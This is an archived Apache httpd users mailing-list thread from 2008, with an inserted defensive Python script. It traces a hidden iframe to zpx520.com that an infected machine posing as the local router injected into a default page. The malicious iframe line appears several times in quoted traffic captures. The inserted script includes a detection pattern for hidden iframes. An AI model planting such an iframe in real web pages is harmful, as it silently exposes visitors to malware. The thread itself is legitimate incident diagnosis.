Posted to users@httpd.apache.org by Greg Mortensen <th...@pobox.com> on 2008/06/18 19:33:50 UTC

[users@httpd] zpx520.com hidden iframe in stock Win32 install?

Hi, list.

I need a quick sanity check.  I have a stock 2.2.9 httpd (Win32 Binary 
including OpenSSL 0.9.8h (MSI Installer)) install on my Windows XP box.  I 
just got the binary from the veritris.com mirror.  The MD5 signature 
checks out fine.

Everything looked OK while connecting to localhost, but I noticed a funny 
0x0 "blip" in the left-hand corner when viewing it remotely.  I decided to 
connect to it by hand, and I found a hidden iframe element that's not in 
the index.html file:

$ telnet 192.168.8.150 80
Trying 192.168.8.150...
Connected to 192.168.8.150.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 264
Content-Type: text/html

<iframe src='http://www.zpx520.com/0.htm' width=0 height=0></iframe> 
<html><body><h1>It works!</h1></body></html>


   I tried it on another XP machine, and I got the same result.  Before I 
try to narrow this down to httpd / my machines / myself, I'd like to ask
if anyone else has seen this?  A virus and spyware scan came up OK on both 
machines.

   I haven't compiled this version from source yet, but I'm going to try 
that next.

   Regards,
     Greg

  \|/   ___   \|/    thevision@pobox.com    +----- 2048R/38BD6CAB -----+
   @~./'O o`\.~@                            | 02BD EF81 91B3 1B33 64C2 |
  /__( \___/ )__\                           | 3247 6722 7006 38BD 6CAB |
     `\__`U_/'                              +--------------------------+

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Re: [users@httpd] zpx520.com hidden iframe in stock Win32 install?

Posted by Greg Mortensen <th...@pobox.com>.
On Wed, 18 Jun 2008, Mark H. Wood wrote:

>  http://www.threatexpert.com/report.aspx?uid=681ac5d0-36d8-4217-8e0f-38f5b928fb14

   It turns out that another machine on the network had become infected 
with "something" (we haven't determined with what, yet) and was 
advertising itself as the local default router.  The iframe problem went 
away as soon as the machine was unplugged.

   Regards,
     Greg




Re: [users@httpd] zpx520.com hidden iframe in stock Win32 install?

Posted by "Mark H. Wood" <mw...@IUPUI.Edu>.
A quick search turns up this page:

  http://www.threatexpert.com/report.aspx?uid=681ac5d0-36d8-4217-8e0f-38f5b928fb14

-- 
Mark H. Wood, Lead System Programmer   mwood@IUPUI.Edu
Typically when a software vendor says that a product is "intuitive" he
means the exact opposite.


Re: [users@httpd] zpx520.com hidden iframe in stock Win32 install?

Posted by Greg Mortensen <th...@pobox.com>.
On Wed, 18 Jun 2008, Issac Goldstand wrote:

> Doesn't sound right to me...  I've certainly never noticed it on win32 
> installs, though I don't have an environment to test it myself just now

   I just tried 2.0.63 and the same thing happens.  Using a handful of 
Sysinternals tools, I can see the following:

[1] The index.html is read (44 bytes).

[2] A network trace (running on the httpd server) shows that all of the 
HTTP headers and the real index.html go out:

HTTP/1.1 200 OK
Date: Wed, 18 Jun 2008 19:28:31 GMT
Server: Apache/2.2.9 (Win32)
Last-Modified: Sat, 20 Nov 2004 18:16:24 GMT
ETag: "13000000004c24-2c-3e9549efc6e00"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug

<html><body><h1>It works!</h1></body></html>

[3] A network trace (on the client) shows that the majority of the HTTP 
headers are thrown away and the iframe element inserted:

HTTP: ----- HyperText Transfer Protocol -----
HTTP:
HTTP: HTTP/1.1 200 OK
HTTP: Content-Length: 265
HTTP: Content-Type: text/html
HTTP:
HTTP: <iframe src='http://www.zpx520.com/0.htm' width=0 height=0></iframe> 
<html><body><h1>It works!</h1></body></html>
HTTP:


"Something" between #2 and #3 is molesting the data.  I haven't figured 
out the "something" yet, but I noticed that this only happens on the server 
running on port 80.  I also noticed that disabling mod_mime causes the 
data to go out properly.

   Regards,
     Greg


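A defender-side check for the kind of in-path tampering the two traces above show, added here as an example and not code from the thread. It compares a response as the server sent it with the copy the client received and reports dropped headers, a changed Content-Length and an injected 0x0 iframe; the two captures are constructed from the quoted traces, not the original packet dumps.

```python
"""Flag HTTP responses that were rewritten between server and client."""
import re

# Constructed from the traces quoted in the thread (not verbatim captures).
SERVER_SIDE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Wed, 18 Jun 2008 19:28:31 GMT\r\n"
    "Server: Apache/2.2.9 (Win32)\r\n"
    "Content-Length: 44\r\n"
    "Connection: close\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body><h1>It works!</h1></body></html>"
)
CLIENT_SIDE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Length: 265\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<iframe src='http://www.zpx520.com/0.htm' width=0 height=0></iframe> \n"
    "<html><body><h1>It works!</h1></body></html>"
)

# An iframe whose width or height is exactly 0: invisible to the user.
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*\b(?:width|height)\s*=\s*['\"]?0(?![\d.%])", re.IGNORECASE)


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status line, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def compare_responses(server_raw, client_raw):
    """Return findings describing how the client's copy differs from the server's."""
    _, s_hdr, s_body = parse_response(server_raw)
    _, c_hdr, c_body = parse_response(client_raw)
    findings = []
    dropped = sorted(set(s_hdr) - set(c_hdr))
    if dropped:
        findings.append("headers dropped in transit: " + ", ".join(dropped))
    if s_hdr.get("content-length") != c_hdr.get("content-length"):
        findings.append("Content-Length changed %s -> %s"
                        % (s_hdr.get("content-length"), c_hdr.get("content-length")))
    if c_body != s_body:
        findings.append("body modified in transit")
        if HIDDEN_IFRAME.search(c_body) and not HIDDEN_IFRAME.search(s_body):
            findings.append("hidden 0x0 iframe injected")
    return findings
```

In practice the server-side capture comes from a sniffer on the httpd host and the client-side one from the viewing machine, as in the thread; a non-empty result points at the network path, not at httpd.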


Re: [users@httpd] zpx520.com hidden iframe in stock Win32 install?

Posted by Issac Goldstand <ma...@beamartyr.net>.
Greg Mortensen wrote:
> Hi, list.
>
> I need a quick sanity check.  I have a stock 2.2.9 httpd (Win32 Binary 
> including OpenSSL 0.9.8h (MSI Installer)) install on my Windows XP 
> box.  I just got the binary from the veritris.com mirror.  The MD5 
> signature checks out fine.
>
> Everything looked OK while connecting to localhost, but I noticed a 
> funny 0x0 "blip" in the left-hand corner when viewing it remotely.  I 
> decided to connect to it by hand, and I found a hidden iframe element 
> that's not in the index.html file:
>
> $ telnet 192.168.8.150 80
> Trying 192.168.8.150...
> Connected to 192.168.8.150.
> Escape character is '^]'.
> GET / HTTP/1.0
>
> HTTP/1.1 200 OK
> Content-Length: 264
> Content-Type: text/html
>
> <iframe src='http://www.zpx520.com/0.htm' width=0 height=0></iframe> 
> <html><body><h1>It works!</h1></body></html>
>
>
>   I tried it on another XP machine, and I got the same result.  Before 
> I try to narrow this down to httpd / my machines / myself, I'd like to 
> ask
> if anyone else has seen this?  A virus and spyware scan came up OK on 
> both machines.
>
Doesn't sound right to me...  I've certainly never noticed it on win32 
installs, though I don't have an environment to test it myself just now
